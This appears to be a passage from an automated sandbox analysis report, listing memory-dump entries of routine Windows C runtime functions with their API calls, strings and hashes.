                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: CompareStringtry_get_function
                                • String ID: CompareStringEx
                                • API String ID: 3328479835-2590796910
                                • Opcode ID: 5404a8951eb19c2e43980fe112d8ed4f76f0e26ed6096fb351f3d5ce8179b2da
                                • Instruction ID: ef66b9f399e0a5842cebd675c6a7fc538ecf6abf50c32d9de31a5e89a5587177
                                • Opcode Fuzzy Hash: 5404a8951eb19c2e43980fe112d8ed4f76f0e26ed6096fb351f3d5ce8179b2da
                                • Instruction Fuzzy Hash: 49111436618B8086D764CB56F48039AB7A5F7D9B90F54812AEE8D83B19CF38C5518B40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Stringtry_get_function
                                • String ID: LCMapStringEx
                                • API String ID: 2588686239-3893581201
                                • Opcode ID: 56ad72a453645d5bc782d36478b95a252feaee8a2c5e32675da4cbc750dc409a
                                • Instruction ID: 94937920bab6fab3a4d370503ba38288e2bfa751f35a336e7fb0ddbca49320db
                                • Opcode Fuzzy Hash: 56ad72a453645d5bc782d36478b95a252feaee8a2c5e32675da4cbc750dc409a
                                • Instruction Fuzzy Hash: CD112636608B8486D760CF96F4803AAB7A5F7D9BD4F54412AEECD83B28DF38C5558B40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 01210818: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 0121085C
                                  • Part of subcall function 01210818: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 012108A2
                                • __std_exception_copy.LIBVCRUNTIME ref: 0118428D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ExceptionFileHeaderRaise__std_exception_copy
                                • String ID: :@$Clone() is not implemented yet.
                                • API String ID: 3973727643-2956181138
                                • Opcode ID: 9d5d39f737b4fa42b236eb707c6e6e4d0a026c60cf872398e7d6dc3608226a8a
                                • Instruction ID: 754d156a0390f81d5265c40fdee0e52c5b5b684bdbc6e271f3f0035226dde7f1
                                • Opcode Fuzzy Hash: 9d5d39f737b4fa42b236eb707c6e6e4d0a026c60cf872398e7d6dc3608226a8a
                                • Instruction Fuzzy Hash: CA118E72610B45A2DB00EF24E9803997374FBA8788F909122D79C43728FF38CAA9C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 0121085C
                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 012108A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ExceptionFileHeaderRaise
                                • String ID: csm
                                • API String ID: 2573137834-1018135373
                                • Opcode ID: bf1a2b604bd42ded7a67fdc8b87129258e6628ae8c9d26867ecfac17def29820
                                • Instruction ID: c9e2770f2c54ef71a4948951d804ceee0e6f4bbd8782b6f6c262f69aa69d0910
                                • Opcode Fuzzy Hash: bf1a2b604bd42ded7a67fdc8b87129258e6628ae8c9d26867ecfac17def29820
                                • Instruction Fuzzy Hash: 5C115E32218B8482EB21CF19F4403597BA1F798B88F194224EF8D07729DF3CC595CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __std_exception_copy.LIBVCRUNTIME ref: 011840ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: __std_exception_copy
                                • String ID: :@$`@@
                                • API String ID: 592178966-1323395004
                                • Opcode ID: 3afcebc26415b96df084b45b01dff4f94099be5ba1a685166c8450af5c7e1137
                                • Instruction ID: 4da82f70213ae4fb850704b01bae77c08e223d228441e781c030e6f1c9ef8b94
                                • Opcode Fuzzy Hash: 3afcebc26415b96df084b45b01dff4f94099be5ba1a685166c8450af5c7e1137
                                • Instruction Fuzzy Hash: 43014872601F44A6DB05CF25EA8038833B4F768B84F509122DB4C43724EF34D5B4C340
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 0122D675
                                • GetUserDefaultLCID.KERNEL32(?,?,000000A0,012386EC), ref: 0122D68C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: DefaultUsertry_get_function
                                • String ID: GetUserDefaultLocaleName
                                • API String ID: 3217810228-151340334
                                • Opcode ID: 91c7438c4588fed9071f20b376e2a7813ea82dc8bd9fadb9cb0bc31f97504786
                                • Instruction ID: a01c5f4c3f8af698a696b0cbc9bc60368439af8d428399e57adcce8b10c80fec
                                • Opcode Fuzzy Hash: 91c7438c4588fed9071f20b376e2a7813ea82dc8bd9fadb9cb0bc31f97504786
                                • Instruction Fuzzy Hash: E1F0E570310A55D2EB18ABE6F6847FD22A2BB5CBC0F955025CA0947B14DE3CC4958740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 0122D555
                                • TlsSetValue.KERNEL32(?,?,8000000000000000,0122CDFE,?,?,8000000000000000,012223C9,?,?,?,?,0122CF6D), ref: 0122D56C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Valuetry_get_function
                                • String ID: FlsSetValue
                                • API String ID: 738293619-3750699315
                                • Opcode ID: a62eb9ecbf63b9dddf563886efcd4d341455927f26ad32849668216b513b1955
                                • Instruction ID: 117c193b05a8621a5cb5e7953af79be1008468d5b41cf089f14c20009ecd0ab7
                                • Opcode Fuzzy Hash: a62eb9ecbf63b9dddf563886efcd4d341455927f26ad32849668216b513b1955
                                • Instruction Fuzzy Hash: C1E0D8B2310A44D2EB089B95F8403E97323EB48794F485026DA0907364DE7CC4B5C700
                                Uniqueness

                                Uniqueness Score: -1.00%